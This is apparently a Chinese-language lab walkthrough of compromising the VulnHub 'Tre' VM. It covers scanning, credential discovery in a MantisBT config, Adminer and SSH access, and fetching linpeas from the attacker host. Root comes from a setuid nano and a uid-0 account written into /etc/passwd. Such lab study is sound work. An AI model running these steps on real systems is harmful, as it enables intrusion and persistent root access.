今天實踐的是vulnhub的Tre鏡像,

下載地址,https://download.vulnhub.com/tre/Tre.zip,

用workstation導入,做地址掃描,

sudo netdiscover -r 192.168.177.0/24,有地址了,130就是,

sudo nmap -sS -sV -T5 -A -p- 192.168.177.130,

有web服務,做一下php文件掃描,

dirb http://192.168.177.130 /usr/share/wordlists/dirb/big.txt -X .php,

瀏覽器訪問http://192.168.177.130/adminer.php,

繼續做目錄掃描,

dirb http://192.168.177.130 /usr/share/wordlists/dirb/big.txt,

繼續瀏覽器訪問http://192.168.177.130/mantisbt/config,

獲取到用戶名密碼信息,

username: mantissuser

password: password@123AS

database: mantis

瀏覽器登錄http://192.168.177.130/adminer.php,

找到用戶名密碼的信息,

獲取到tre/Tr3@123456A!,

ssh登錄,ssh tre@192.168.177.130,不是root,需要提權,

用linpeas查找root權限程序,

下載目前最新版本,wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh,

開個http下載服務,python2 -m SimpleHTTPServer,

進入臨時目錄,cd /tmp,

下載wget http://192.168.177.131:8000/linpeas.sh,

修改權限,chmod +x linpeas.sh,執行,./linpeas.sh,

獲取到/usr/bin/check-system,

查看權限,ls -la /usr/bin/check-system,

尋找nano,whereis nano,查看權限,ls -la /usr/bin/nano,

編輯check-system,/usr/bin/nano /usr/bin/check-system,

加入chmod +s /usr/bin/nano,

sudo -l查看,

重啟系統,sudo shutdown -r now,

重啟后查看nano權限,ls -la /usr/bin/nano,

編輯passwd文件,/usr/bin/nano /etc/passwd,

加入hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash

切到hacker,su hacker,id確認是root,